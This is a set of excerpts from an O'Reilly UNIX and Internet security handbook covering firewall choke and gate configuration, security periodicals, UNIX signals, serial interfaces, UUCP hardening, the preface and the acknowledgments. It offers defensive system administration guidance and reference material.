● Is simple packet filtering enough? If so, you can probably set up your "firewall" simply by adding a few rules to your existing router's configuration files.

● If simple packet filtering is not enough, do I want a gate and one choke, or two?

● Will I allow inbound Telnet connections? If so, how will I authenticate them? How will I prevent passwords from being sniffed?

● How will I get my users to adhere to the organization's firewall policy?

21.2.2 Assembling the Parts<br />

After you have decided on your configuration, you must then assemble the parts. This assembly includes:<br />

Choke

Most organizations use a router. You can use an existing router or purchase a special router for the purpose.

Gate

Usually, the gate is a spare computer running the UNIX operating system. Gates do not need to be top-of-the-line workstations, because the speed at which they function is limited by the speed of your Internet connection, not the speed of your computer's CPU. In many cases, a high-end PC can provide sufficient capacity for your gate.


Software<br />

You'll want to get a variety of software to run on the gate. Start with a firewall toolkit, such as the<br />

one from Trusted Information Systems. You should also have a consistency-checking package,<br />

such as Tripwire, to help you detect intrusion. Finally, consider using a package such as Tiger to<br />

help find security weaknesses in the firewall's <strong>UNIX</strong> configuration.<br />
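Once Tripwire is installed on the gate, the basic cycle looks something like the following sketch. This assumes the freely available COAST (academic) Tripwire distribution and its tw.config file; command names and options may differ in other versions:

# tripwire -initialize
(builds the baseline database from the files listed in tw.config)
# tripwire
(subsequent runs compare the filesystem against the baseline and report added, deleted, and changed files)

Keep the baseline database on read-only media or off the gate entirely, so that an intruder who compromises the firewall cannot quietly bring the database up to date behind you.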

21.2.3 Setting Up the Choke<br />

The choke is the bridge between the inside network and the outside network. It should not forward<br />

packets between the two networks unless the packets have the gate computer as either their destination or<br />

their origination address. You can optionally further restrict the choke so that it forwards only packets for<br />

particular protocols - for example, packets used for mail transfer but not for telnet or rlogin.<br />

There are three main choices for your choke:<br />

1. Use an "intelligent router." Many of these routers can be set up to forward only certain kinds of packets and only between certain addresses.

2. Use a standard UNIX computer with two network interfaces. If you do so, do not run the program /usr/etc/routed (the network routing daemon) on this computer. Set up the computer so that it does not forward packets from one network interface to the other (usually by setting the kernel IP forwarding variable to 0; see the sketch following this list).[7] A computer set up in this fashion is both the choke and the gate.

[7] On Linux, IP forwarding is a compile-time option.

3. Alter your operating system's network driver so that it only accepts packets from the internal network and the choke. If you are running Linux, you can use the operating system's kernel-based IP filtering, accessible through the ipfw command, to prevent the system from receiving packets from non-approved networks or hosts. In the not too distant future, other vendors may offer similar features.
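How you turn off forwarding in the second case is highly system dependent; the commands below are only a sketch, and the variable and device names shown are examples from particular platforms (check your vendor's documentation for the equivalent on your system):

# ndd -set /dev/ip ip_forwarding 0
(Solaris 2.x)
# sysctl -w net.inet.ip.forwarding=0
(4.4BSD-derived systems)
# echo 0 > /proc/sys/net/ipv4/ip_forward
(Linux kernels built with runtime-configurable forwarding)

Also confirm that routed (or gated) is not running - for example, with ps -ef | grep routed - and that it is not started from the system's rc files at boot time.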

The details of how you set up your choke will vary greatly, depending on the hardware you use and that<br />

hardware's software. Therefore, the following sections are only general guidelines.<br />

21.2.4 Choosing the Choke's Protocols<br />

The choke is an intelligent filter: it is usually set up so that only the gate machine can talk to the outside<br />

world. All messages from the outside (whether they're mail, FTP, or attempts to break in) that are<br />

directed to internal machines other than the gate are rejected. Attempts by local machines to contact sites<br />

outside the LAN are similarly denied.<br />

The gate determines destinations, then handles requests or forwards them as appropriate. For instance,<br />

SMTP (mail) requests can be sent to the gate, which resolves local aliases and then sends the mail to the<br />

appropriate internal machine.<br />

Furthermore, you can set up your choke so that only specific kinds of messages are sent through. You<br />

should configure the choke to reject messages using unknown protocols. You can also configure the<br />

choke to specifically reject known protocols that are too dangerous for people in the outside world to use<br />


on your internal computers.<br />

The choke software should carefully examine the option bits that might be set in the header of each IP<br />

packet. Option bits, such as those for IP forwarding, fragmentation, and route recording, may be valid on<br />

some packets. However, they are sometimes set by attackers in an attempt to probe the state of your<br />

firewall or to get packets past a simple choke. Other options, such as source routing, are never<br />

acceptable; packets that specify them should be blocked.<br />

You also want to configure the choke to examine the return addresses (source addresses) on packets.<br />

Packets from outside your network should not state source addresses from inside your network, nor<br />

should they be broadcast or multicast addresses. Otherwise, an attacker might be able to craft packets that<br />

look normal to your choke and clients; in such cases, the responses to these packets are what actually do<br />

the damage.<br />

The choke can also be configured to prevent local users from connecting to outside machines through<br />

unrestricted channels. This type of configuration prevents Trojan-horse programs from installing network<br />

back doors on your local machines. Imagine a public domain data-analysis program that surreptitiously<br />

listens on port 49372 for connections and then forks off a /bin/csh. The configuration also discourages<br />

someone who does manage to penetrate one of your local machines from sending information back to the<br />

outside world.<br />

Ideally, there should be no way to change your choke's configuration from the network. An attacker<br />

trying to tap into your network will be stuck if your choke is a PC-based router that can be<br />

reprogrammed only from its keyboard.<br />

NOTE: The way you configure your choke will depend on the particular router that you are using as a choke; consult your router's documentation for details.



Appendix D: Paper Sources

D.2 Security Periodicals

Computer Audit Update,<br />

Computer Fraud & <strong>Sec</strong>urity Update,<br />

Computer Law & <strong>Sec</strong>urity Report,<br />

Computers & <strong>Sec</strong>urity<br />

Elsevier Advanced Technology<br />

Crown House, Linton Rd.<br />

Barking, Essex IG11 8JU

England<br />

Voice: +44-81-5945942<br />

Fax: +44-81-5945942<br />

Telex: 896950 APPSCI G<br />

North American Distributor:<br />

P.O. Box 882<br />

New York, NY 10159<br />

Voice: +1-212-989-5800<br />

http://www.elsevier.nl/catalogue/<br />

Computer & Communications <strong>Sec</strong>urity Reviews<br />

Northgate Consultants Ltd<br />

Ivy Dene<br />

Lode Fen<br />

Cambridge CB5 9HF<br />

England<br />

Fax: +44 223 334678<br />

http://www.cl.cam.ac.uk/users/rja14/#SR<br />

Computer <strong>Sec</strong>urity, Audit & Control<br />

Box 81151<br />

Wellesley Hills, MA 02181<br />


Voice: +1-617-235-2895<br />

Computer <strong>Sec</strong>urity, Audit & Control<br />

(Law & Protection Report)<br />

P.O. Box 5323<br />

Madison, WI 53705<br />

Voice: +1-608-271-6768<br />

Computer <strong>Sec</strong>urity Alert<br />

Computer <strong>Sec</strong>urity Journal<br />

Computer <strong>Sec</strong>urity Buyers Guide<br />

Computer <strong>Sec</strong>urity Institute<br />

600 Harrison Street<br />

San Francisco, CA 94107<br />

Voice: +1-415-905-2626<br />

http://www.gocsi.com<br />

Disaster Recovery Journal<br />

PO Box 510110<br />

St. Louis, MO 63151<br />

+1 314-894-0276<br />

http://www.drj.com<br />

FBI Law Enforcement Bulletin<br />

Federal Bureau of Investigation<br />

10th and Pennsylvania Avenue<br />

Washington, DC 20535<br />

Voice: +1-202-324-3000<br />

Information Systems <strong>Sec</strong>urity Journal<br />

Auerbach Publications<br />

31 St. James Street<br />

Boston, MA 02116<br />

Voice: +1-800-950-1216<br />

Information Systems Security Monitor

U.S. Department of the Treasury<br />

Bureau of the Public Debt<br />

AIS <strong>Sec</strong>urity Branch<br />

200 3rd Street<br />

Parkersburg, WV 26101<br />

Voice: +1-304-480-6355<br />

BBS: +1-304-480-6083<br />

Info<strong>Sec</strong>urity News<br />

498 Concord Street<br />

Framingham, MA 01701<br />

Voice: +1-508-879-9792<br />


http://www.infosecnews.com/isn/MS7.HTML<br />

A trade magazine that you can probably get for free if you work with security. It is well worth the time<br />

needed to fill out the subscription card!<br />

Journal of Computer <strong>Sec</strong>urity<br />

IOS Press<br />

Van Diemenstraat 94<br />

1013 CN Amsterdam, Netherlands<br />

Fax: +31-20-620-3419<br />

http://www.isse.gmu.edu/~xsis/jcs.html<br />

Police Chief<br />

International Association of Chiefs of Police<br />

110 North Glebe Road, Suite 200<br />

Arlington, VA 22201-9900<br />

Voice: +1-703-243-6500<br />

<strong>Sec</strong>urity Management<br />

American Society for Industrial <strong>Sec</strong>urity<br />

1655 North Fort Meyer Drive, Suite 1200<br />

Arlington, VA 22209<br />

Voice: +1-703-522-5800<br />

Virus Bulletin<br />

Virus Bulletin CTD<br />

Oxon, England

Voice: +44-235-555139<br />

North American Distributor:<br />

RG Software Systems<br />

Voice: +1-602-423-8000<br />

http://www.virusbtn.com<br />



Chapter 18: WWW Security

18.7 Summary

One of the principal goals of good security management is to prevent the disclosure of privileged<br />

information. Running a WWW service implies providing information, quickly and in volume. These two<br />

ideas pose a serious conflict, especially given how recently these services and software have appeared<br />

and how rapidly they are evolving. We have no way of anticipating all the failure modes and problems<br />

these services may bring.<br />

We strongly recommend that you consider running a WWW service on a stripped-down machine that

has been especially designated for that purpose. Put the machine outside your firewall, and let the world<br />

have access to it ... and only to it.<br />



Chapter 14: Telephone Security

14.2 Serial Interfaces

Information inside most computers moves in packets of 8, 16, or 32 bits at a time, using 8, 16, or 32<br />

individual wires. When information leaves a computer, however, it is often divided into a series of single<br />

bits that are transmitted sequentially. Often, these bits are grouped into 8-bit bytes for purposes of error<br />

checking or special encoding. Serial interfaces transmit information as a series of pulses over a single<br />

wire. A special pulse called the start bit signifies the start of each character. The data is then sent down<br />

the wire, one bit at a time, after which another special pulse called the stop bit is sent (see Figure 14.1).

Figure 14.1: A serial interface sending the letter K (ASCII 75)<br />

Because a serial interface can be set up with only three wires (transmit data, receive data, and ground),<br />

it's often used with terminals. With additional wires, serial interfaces can be used to control modems,<br />

allowing computers to make and receive telephone calls.<br />
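In practice, you select the framing parameters (character size, parity, number of stop bits, and line speed) with the stty command rather than by touching the hardware directly. The following is only a sketch: the device name /dev/ttya is an example, and exact option names and conventions vary slightly among UNIX versions.

# stty 9600 cs8 -parenb -cstopb < /dev/ttya
# stty -a < /dev/ttya

The first command sets the port to 9600 bps with 8-bit characters, no parity, and one stop bit; the second displays the port's current settings so that you can confirm the change.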




Appendix C: UNIX Processes

C.3 Signals

Signals are a simple <strong>UNIX</strong> mechanism for controlling processes. A signal is a 5-bit message to a process<br />

that requires immediate attention. Each signal has associated with it a default action; for some signals,<br />

you can change this default action. Signals are generated by exceptions, which include:<br />

● Attempts to use illegal instructions

● Certain kinds of mathematical operations

● Window resize events

● Predefined alarms

● The user pressing an interrupt key on a terminal

● Another program using the kill() or killpg() system calls

● A program running in the background attempting to read from or write to its controlling terminal

● A child process calling exit or terminating abnormally

The system default may be to ignore the signal, to terminate the process receiving the signal (and,<br />

optionally, generate a core file), or to suspend the process until it receives a continuation signal. Some<br />

signals can be caught - that is, a program can specify a particular function that should be run when the<br />

signal is received. By design, <strong>UNIX</strong> supports exactly 31 signals. They are listed in the files<br />

/usr/include/signal.h and /usr/include/sys/signal.h. Table C.6 contains a summary.

Table C.6: UNIX Signals

Signal Name  Number[7]  Key  Meaning[8]
SIGHUP        1              Hangup (sent to a process when a modem or network connection is lost)
SIGINT        2              Interrupt (generated by CTRL-C (Berkeley UNIX) or RUBOUT (System V))
SIGQUIT       3         *    Quit
SIGILL        4         *    Illegal instruction
SIGTRAP       5         *    Trace trap
SIGIOT        6         *    I/O trap instruction; used on PDP-11 UNIX
SIGEMT        7         *    Emulator trap instruction; used on some computers without floating-point hardware support
SIGFPE        8         *    Floating-point exception
SIGKILL       9         !    Kill
SIGBUS        10        *    Bus error (invalid memory reference, such as an attempt to read a full word on a half-word boundary)
SIGSEGV       11        *    Segmentation violation (invalid memory reference, such as an attempt to read outside a process's memory map)
SIGSYS        12        *    Bad argument to a system call
SIGPIPE       13             Write on a pipe that has no process to read it
SIGALRM       14             Timer alarm
SIGTERM       15             Software termination signal (default kill signal)
SIGURG        16        @    Urgent condition present
SIGSTOP       17        +!   Stop process
SIGTSTP       18        +    Stop signal generated by keyboard
SIGCONT       19        @    Continue after stop
SIGCHLD       20        @    Child process state has changed
SIGTTIN       21        +    Read attempted from control terminal while process is in background
SIGTTOU       22        +    Write attempted to control terminal while process is in background
SIGIO         23        @    Input/output event
SIGXCPU       24             CPU time limit exceeded
SIGXFSZ       25             File size limit exceeded
SIGVTALRM     26             Virtual time alarm
SIGPROF       27             Profiling timer alarm
SIGWINCH      28        @    tty window has changed size
SIGLOST       29             Resource lost
SIGUSR1       30             User-defined signal #1
SIGUSR2       31             User-defined signal #2

[7] The signal number varies on some systems.
[8] The default action for most signals is to terminate.

Key:
*   If signal is not caught or ignored, generates a core image dump.
@   Signal is ignored by default.
+   Signal causes process to suspend.
!   Signal cannot be caught or ignored.

Signals are normally used between processes for process control. They are also used within a process to<br />

indicate exceptional conditions that should be handled immediately (for example, floating-point<br />


overflows).<br />
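Within a shell script, for example, the trap built-in lets you catch or ignore many of these signals (specified by number in the Bourne shell), while SIGKILL and SIGSTOP remain uncatchable. The following is only a sketch; the scratch file and the sort command stand in for whatever work your script actually does:

#!/bin/sh
# Remove the scratch file if we are hung up, interrupted, or terminated
# (SIGHUP=1, SIGINT=2, SIGTERM=15).
trap 'rm -f /tmp/scratch.$$; exit 1' 1 2 15
# Ignore SIGQUIT (3) so a stray CTRL-\ cannot kill the job.
trap '' 3
sort /etc/passwd > /tmp/scratch.$$
# ... use the scratch file ...
rm -f /tmp/scratch.$$

Signals are delivered from other processes with the kill command or the kill() system call, described in the next section; kill -9 (SIGKILL) always terminates the target because signal 9 can be neither caught nor ignored.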



Chapter 16: TCP/IP Networks

16.5 Summary

Connecting to a network opens a whole new set of security considerations above and beyond those of<br />

protecting accounts and files. Various forms of network protocols, servers, clients, routers, and other<br />

network components complicate the picture. To be safely connected requires an understanding of how<br />

these components are configured and interact.<br />

Connections to networks with potentially unfriendly users should be done with a firewall in place.<br />

Connections to a local area network that involves only your company or university may not require a<br />

firewall, but still require proper configuration and monitoring.<br />

In later chapters we will discuss some of these other considerations. We cannot provide truly<br />

comprehensive coverage of all the related issues, however, so we encourage you to pursue the references

listed in Appendix D.<br />



Chapter 27: Who Do You Trust?

27.4 What All This Means

We haven't presented the material in this chapter to induce paranoia in you, gentle reader. Instead, we<br />

want to get across the point that you need to consider carefully who and what you trust. If you have<br />

information or equipment that is of value to you, you need to think about the risks and dangers that might<br />

be out there. To have security means to trust, but that trust must be well placed.<br />

If you are protecting information that is worth a great deal, attackers may well be willing to invest<br />

significant time and resources to break your security. You may also think you don't have information that<br />

is worth a great deal; nevertheless, you are a target anyway. Why? Your site may be a convenient<br />

stepping stone to another, more valuable site. Or perhaps one of your users is storing information of great<br />

value that you don't know about. Or maybe you simply don't realize how much the information you have<br />

is actually worth. For instance, in the late 1980's, Soviet agents were willing to pay hundreds of<br />

thousands of dollars for copies of the VMS operating system source - the same source that many site<br />

administrators kept in unlocked cabinets in public computer rooms.<br />

To trust, you need to be suspicious. Ask questions. Do background checks. Test code. Get written<br />

assurances. Don't allow disclaimers. Harbor a healthy suspicion of fortuitous coincidences (the FBI<br />

happening to call or that patch tape showing up by FedEx, hours after you discover someone trying to<br />

exploit a bug that the patch purports to fix). You don't need to go overboard, but remember that the best

way to develop trust is to anticipate problems and attacks, and then test for them. Then test again, later.<br />

Don't let a routine convince you that no problems will occur.<br />

If you absorb everything we've written in this book, and apply it, you'll be way ahead of the game.<br />

However, this information is only the first part of a comprehensive security plan. You need to constantly<br />

be accumulating new information, studying your risks, and planning for the future. Complacency is one<br />

of the biggest dangers you can face. As we said at the beginning of the book, <strong>UNIX</strong> can be a secure<br />

system, but only if you understand it and deploy it in a monitored environment.<br />

You can trust us on that.<br />



Chapter 5: The UNIX Filesystem

5.10 Summary

The <strong>UNIX</strong> filesystem is the primary tool that is used by the <strong>UNIX</strong> operating system for enforcing<br />

computer security. Although the filesystem's concepts of security - separate access permissions for the

file's user, group, and world - are easy to understand, a <strong>UNIX</strong> system can be very difficult to administer<br />

because of the complexity of getting every single file permission correct.<br />

Because of the attention to detail required by the <strong>UNIX</strong> system, you should use measures beyond the<br />

filesystem to protect your data. One of the best techniques that you can use is encryption, which we<br />

describe in the next chapter.<br />



Appendix E: Electronic Resources

E.2 Usenet Groups

There are several Usenet newsgroups that you might find to be interesting sources of information on<br />

network security and related topics. However, the unmoderated lists are the same as other unmoderated<br />

groups on the Usenet: repositories of material that is often off-topic, repetitive, and incorrect. Our<br />

warning about material found in mailing lists, expressed earlier, applies doubly to newsgroups.<br />

comp.security.announce (moderated)<br />

Computer security announcements, including new CERT-CC advisories<br />

comp.security.unix<br />

<strong>UNIX</strong> security<br />

comp.security.misc<br />

Miscellaneous computer and network security<br />

comp.security.firewalls<br />

Information about firewalls<br />

comp.virus (moderated)<br />

Information on computer viruses and related topics<br />

alt.security<br />

Alternative discussions of computer and network security<br />

comp.admin.policy<br />

Computer administrative policy issues, including security<br />

comp.protocols.tcp-ip<br />

TCP/IP internals, including security<br />

comp.unix.admin<br />

<strong>UNIX</strong> system administration, including security<br />

comp.unix.wizards<br />

<strong>UNIX</strong> kernel internals, including security<br />

sci.crypt<br />


Discussions about cryptology research and application<br />

sci.crypt.research (moderated)<br />

Discussions about cryptology research<br />

comp.society.cu-digest (moderated)<br />

As described above<br />

comp.risks (moderated)<br />

As described above<br />



Chapter 15: UUCP

15.9 Summary

Although UUCP can be made relatively secure, most versions of UUCP, as distributed by vendors, are<br />

not. If you do not intend to use UUCP, you may wish to delete (or protect) the UUCP system altogether.<br />

If you are not running UUCP, check the permissions on the uucppublic directory, and set them to 0.<br />

If you do use UUCP:<br />

● Be sure that the UUCP control files are protected and cannot be read or modified using the UUCP program (see the example following this list).

● Only give uucp access to the directories to which it needs access. You may wish to limit uucp to the directory /usr/spool/uucppublic.

● If possible, assign a different login to each UUCP site.

● Consider using callback on your connections.

● Limit the commands which can be executed from off-site to those that are absolutely necessary.

● Disable or delete any uucpd daemon if you aren't using it.

● Remove all of the UUCP software and libraries if you aren't going to use them.

● Be sure to add all uucp accounts to the ftpusers restriction file.
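As a sketch, on a system with HoneyDanBer UUCP several of these checks might look like the following. The file locations are examples only; Version 2 UUCP keeps its control files under different names (such as L.sys), so substitute the paths your system actually uses.

If you are not running UUCP at all:

# chmod 0 /usr/spool/uucppublic

If you are running UUCP, make sure the control files are readable only by the uucp account, and keep the uucp logins out of FTP:

# ls -l /usr/lib/uucp/Systems /usr/lib/uucp/Permissions
# chmod 400 /usr/lib/uucp/Systems /usr/lib/uucp/Permissions
# echo uucp >> /etc/ftpusers
# echo nuucp >> /etc/ftpusers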



Preface

Scope of This Book

This book is divided into seven parts; it includes 27 chapters and 7 appendixes.

Part I, Computer <strong>Sec</strong>urity Basics, provides a basic introduction to security policy. The chapters are<br />

written to be accessible to both users and administrators.<br />

Chapter 1, Introduction, provides a history of the <strong>UNIX</strong> operating system and an introduction to <strong>UNIX</strong><br />

security. It also introduces basic terms we use throughout the book.<br />

Chapter 2, Policies and Guidelines, examines the role of setting good policies to guide protection of your<br />

systems. It also describes the trade-offs that must be made to account for cost, risk, and corresponding<br />

benefits.<br />

Part II, User Responsibilities, provides a basic introduction to <strong>UNIX</strong> host security. The chapters are<br />

written to be accessible to both users and administrators.<br />

Chapter 3, Users and Passwords, is about UNIX user accounts. It discusses the purpose of passwords, explains what makes good

and bad passwords, and describes how the crypt( ) password encryption system works.<br />

Chapter 4, Users, Groups, and the Superuser, describes how UNIX groups can be

used to control access to files and devices. It also discusses the <strong>UNIX</strong> superuser and the role that special<br />

users play.<br />

Chapter 5, The <strong>UNIX</strong> Filesystem, discusses the security provisions of the <strong>UNIX</strong> filesystem and tells how<br />

to restrict access to files and directories to the file's owner, to a group of people, or to everybody on the<br />

computer system.<br />

Chapter 6, Cryptography, discusses the role of encryption and message digests in your security. It<br />

includes a discussion of several popular encryption schemes, including the PGP mail package.

Part III, System <strong>Sec</strong>urity, is directed primarily towards the <strong>UNIX</strong> system administrator. It describes how<br />

to configure <strong>UNIX</strong> on your computer to minimize the chances of a break-in, as well as to limit the<br />

opportunities for a nonprivileged user to gain superuser access.<br />

Chapter 7, Backups, discusses how and why to make archival backups of your storage. It includes<br />

discussions of backup strategies for different types of organizations.<br />

Chapter 8, Defending Your Accounts, describes ways that a computer cracker might try to initially break<br />


into your computer system. By knowing these "doors" and closing them, you increase the security of<br />

your system.<br />

Chapter 9, Integrity Management, discusses how to monitor your filesystem for unauthorized changes.<br />

This includes coverage of the use of message digests and read-only disks, and the configuration and use<br />

of the Tripwire utility.<br />

Chapter 10, Auditing and Logging, discusses the logging mechanisms that <strong>UNIX</strong> provides to help you<br />

audit the usage and behavior of your system.<br />

Chapter 11, Protecting Against Programmed Threats, is about computer viruses, worms, and Trojan<br />

horses. This chapter contains detailed tips that you can use to protect yourself from these electronic<br />

vermin.<br />

Chapter 12, Physical <strong>Sec</strong>urity. What if somebody gets frustrated by your super-secure system and<br />

decides to smash your computer with a sledgehammer? This chapter describes physical perils that face<br />

your computer and its data and discusses ways of protecting them.<br />

Chapter 13, Personnel <strong>Sec</strong>urity, examines concerns about who you employ and how they fit into your<br />

overall security scheme.<br />

Part IV, Network and <strong>Internet</strong> <strong>Sec</strong>urity, is about the ways in which individual <strong>UNIX</strong> computers<br />

communicate with one another and the outside world, and the ways that these systems can be subverted<br />

by attackers to break into your computer system. Because many attacks come from the outside, this part<br />

of the book is vital reading for anyone whose computer has outside connections.<br />

Chapter 14, Telephone <strong>Sec</strong>urity, describes how modems work and provides step-by-step instructions for<br />

testing your computer's modems to see if they harbor potential security problems.<br />

Chapter 15, UUCP, is about the <strong>UNIX</strong>-to-<strong>UNIX</strong> copy system, which can use standard phone lines to<br />

copy files, transfer electronic mail, and exchange news. This chapter explains how UUCP works and tells<br />

you how to make sure that it can't be subverted to damage your system.<br />

Chapter 16, TCP/IP Networks, provides background on how TCP/IP networking programs work and<br />

describes the security problems they pose.<br />

Chapter 17, TCP/IP Services, discusses the common IP network services found on <strong>UNIX</strong> systems,<br />

coupled with common problems and pitfalls.<br />

Chapter 18, WWW <strong>Sec</strong>urity, describes some of the issues involved in running a World Wide Web server<br />

without opening your system to security problems. The issues discussed here should also be borne in<br />

mind when operating any other kind of network-based information server.<br />

Chapter 19, RPC, NIS, NIS+, and Kerberos, discusses a variety of network information services. It<br />

covers some of how they work, and common pitfalls.<br />

Chapter 20, NFS, describes how Sun Microsystems' Network Filesystem works and its potential security<br />

problems.<br />


Part V, Advanced Topics, discusses issues that arise when organizational networks are interconnected<br />

with the <strong>Internet</strong>. It also covers ways of increasing your security through better programming.<br />

Chapter 21, Firewalls, describes how to set up various types of firewalls to protect an internal network<br />

from an external attacker.<br />

Chapter 22, Wrappers and Proxies, describes a few common wrapper and proxying programs to help<br />

protect your machine and the programs within it without requiring access to source code.<br />

Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs, describes common pitfalls when writing your<br />

own software. It gives tips on how to write robust software that will resist attack from malicious users.<br />

Part VI, Handling <strong>Sec</strong>urity Incidents, contains instructions about what to do if your computer's security is<br />

compromised. This part of the book will also help system administrators protect their systems from<br />

authorized users who are misusing their privileges.<br />

Chapter 24, Discovering a Break-in, contains step-by-step directions to follow if you discover that an<br />

unauthorized person is using your computer.<br />

Chapter 25, Denial of Service Attacks and Solutions, describes ways that legitimate, authorized users can<br />

make your system inoperable, ways that you can find out who is doing what, and what to do about it.<br />

Chapter 26, Computer <strong>Sec</strong>urity and U.S. Law. Occasionally the only thing you can do is sue or try to<br />

have your attackers thrown into jail. This chapter describes the legal recourse you may have after a<br />

security breach and discusses why legal approaches are often not helpful. It also covers some emerging<br />

concerns about running server sites connected to a wide area network such as the <strong>Internet</strong>.<br />

Chapter 27, Who Do You Trust?, is the concluding chapter that makes the point that somewhere along<br />

the line, you need to trust a few things, and people. However, are you trusting the right ones?<br />

Part VII, Appendixes, contains a number of useful lists and references.<br />

Appendix A, <strong>UNIX</strong> <strong>Sec</strong>urity Checklist, contains a point-by-point list of many of the suggestions made in<br />

the text of the book.<br />

Appendix B, Important Files, is a list of the important files in the <strong>UNIX</strong> filesystem and a brief discussion<br />

of their security implications.<br />

Appendix C, <strong>UNIX</strong> Processes, is a technical discussion of how the <strong>UNIX</strong> system manages processes. It<br />

also describes some of the special attributes of processes, including the UID, GID, and SUID.<br />

Appendix D, Paper Sources, lists books, articles, and magazines about computer security.

Appendix E, Electronic Resources, is a brief listing of some significant security tools to use with <strong>UNIX</strong>,<br />

including directions on where to find them on the <strong>Internet</strong>.<br />

Appendix F, Organizations, contains the names, telephone numbers, and addresses of organizations that<br />

are devoted to seeing computers become more secure.<br />


Appendix G, Table of IP Services, lists all of the common TCP/IP protocols, along with their port<br />

numbers and suggested handling by a firewall.<br />

<strong>UNIX</strong> "<strong>Sec</strong>urity"? Which <strong>UNIX</strong> System?<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_02.htm (4 of 4) [2002-04-12 10:45:53]


Preface

Conventions Used in This Book

The following conventions are used in this book:<br />

Italic is used for <strong>UNIX</strong> file, directory, user, command, and group names and for system calls, passwords,<br />

and URLs. It is also used to emphasize new terms and concepts when they are introduced.<br />

Constant Width is used for code examples and any system output.<br />

Constant Width Italic is used in examples for variable input or output (e.g., a filename).<br />

Constant Width Bold is used in examples for user input.<br />

Strike-through is used in examples to show input typed by the user that is not echoed by the computer.<br />

This is mainly used for passwords and passphrases that are typed.<br />

call ( ) is used to indicate a system call, in contrast to a command. In the original edition of the book, we<br />

referred to commands in the form command (1) and to calls in the form call (2) or call (3), where the<br />

number indicates the section of the <strong>UNIX</strong> programmer's manual in which the command or call is<br />

described. Because different vendors now have diverged in their documentation section numbering, we<br />

do not use this convention in this second edition of the book. (Consult your own documentation index for<br />

the right section.) The call ( ) convention is helpful in differentiating, for example, between the crypt<br />

command and the crypt ( ) library function.<br />

% is the <strong>UNIX</strong> C shell prompt.<br />

$ is the <strong>UNIX</strong> Bourne shell or Korn shell prompt.<br />

# is the <strong>UNIX</strong> superuser prompt (Korn, Bourne, or C shell). We usually use this for examples that should<br />

be executed by root.<br />

Normally, we will use the Bourne or Korn shell in our examples unless we are showing something that is<br />

unique to the C shell.<br />

[ ] surround optional values in a description of program syntax. (The brackets themselves should never<br />

be typed.)<br />

CTRL-X or ^X indicates the use of control characters. It means hold down the CONTROL key while<br />

typing the character "X."<br />

All command examples are followed by RETURN unless otherwise indicated.<br />



Preface

Online Information

Examples and other online information related to this book are available on the World Wide Web and via<br />

anonymous FTP. See the insert in the book for information about all of <strong>O'Reilly</strong>'s online services.<br />



Preface

Acknowledgments

We have many people to thank for their help on the original book and on this very substantial revision of<br />

that original book.<br />

First Edition<br />

The first edition of this book originally began as a suggestion by Victor Oppenheimer, Deborah Russell,

and Tim <strong>O'Reilly</strong> at <strong>O'Reilly</strong> & Associates.<br />

Our heartfelt thanks to those people who reviewed the manuscript of the first edition in depth: Matt<br />

Bishop (UC Davis), Bill Cheswick, Andrew Odlyzko, and Jim Reeds (AT&T Bell Labs) (thanks also to<br />

Andrew and to Brian LaMacchia for criticizing the section on network security in an earlier draft as<br />

well), Paul Clark (Trusted Information Systems), Tom Christiansen (Convex Computer Corporation),<br />

Brian Kantor (UC San Diego), Laurie Sefton (Apple), Daniel Trinkle (Purdue's Department of Computer<br />

Sciences), Beverly Ulbrich (Sun Microsystems), and Tim <strong>O'Reilly</strong> and Jerry Peek (<strong>O'Reilly</strong> &<br />

Associates). Thanks also to Chuck McManis and Hal Stern (Sun Microsystems), who reviewed the<br />

chapters on NFS and NIS. We are grateful for the comments by Assistant U.S. Attorney William Cook<br />

and by Mike Godwin (Electronic Frontier Foundation) who both reviewed the chapter on the law. Fnz<br />

Jntfgnss (Purdue) provided very helpful feedback on the chapter on encryption-gunaxf! Steve Bellovin<br />

(AT&T), Cliff Stoll (Smithsonian), Bill Cook, and Dan Farmer (CERT) all provided moral support and<br />

helpful comments. Thanks to Jan Wortelboer, Mike Sullivan, John Kinyon, Nelson Fernandez, Mark<br />

Eichin, Belden Menkus, and Mark Hanson for finding so many typos! Thanks as well to Barry Z. Shein<br />

(Software Tool and Die) for being such an icon and <strong>UNIX</strong> historian. Steven Wadlow provided the<br />

pointer to Lazlo Hollyfeld. The quotations from Dennis Ritchie are from an interview with Simson<br />

Garfinkel that occurred during the summer of 1990.<br />

Many people at <strong>O'Reilly</strong> & Associates helped with the production of the first edition of the book. Debby<br />

Russell edited the book. Rosanne Wagger and Kismet McDonough did the copyediting and production.<br />

Chris Reilley developed the figures. Edie Freedman designed the cover and the interior design. Ellie<br />

Cutler produced the index.<br />

Special thanks to Kathy Heaphy, Gene Spafford's long-suffering and supportive wife, and to Georgia<br />

Conarroe, his secretary at Purdue University's Department of Computer Science, for their support while<br />

we wrote the first edition.<br />


<strong>Sec</strong>ond Edition<br />

We are grateful to everyone who helped us develop the second edition of this book. The book, and the<br />

amount of work required to complete it, ended up being much larger than we originally envisioned. We<br />

started the rewrite of this book in January 1995; we finished it in March 1996, many months later than<br />

we had intended.<br />

Our thanks to the people at Purdue University in the Computer Sciences Department and the COAST<br />

Laboratory who read and reviewed early drafts of this book: Mark Crosbie, Bryn Dole, Adam Hammer,<br />

Ivan Krsul, Steve Lodin, Dan Trinkle, and Keith A. Watson; Sam Wagstaff also commented on<br />

individual chapters.<br />

Thanks to our technical reviewers: Fred Blonder (NASA), Brent Chapman (Great Circle Associates),<br />

Michele Crabb (NASA), James Ellis (CERT/CC), Dan Farmer (Sun), Eric Halil (AUSCERT), Doug<br />

Hosking (Systems Solutions Group), Tom Longstaff (CERT/CC), Danny Smith (AUSCERT), Jan<br />

Wortelboer (University of Amsterdam), David Waitzman (BBN), and Kevin Ziese (USAF). We would<br />

also like to thank our product-specific reviewers, who made a careful reading of the text to identify<br />

problems and add content applicable to particular <strong>UNIX</strong> versions or products. They are C.S. Lin (HP),<br />

Carolyn Godfrey (HP), Casper Dik (Sun), Andreas Siegert (IBM/AIX), and Grant Taylor (Linux).

Several people reviewed particular chapters. Peter Salus reviewed the introductory chapter; Ed Ravin<br />

(NASA Goddard Institute for Space Studies) reviewed the UUCP chapter; Adam Stein and Matthew<br />

Howard (Cisco) reviewed the networking chapters; Lincoln Stein (MIT Whitehead Institute) reviewed<br />

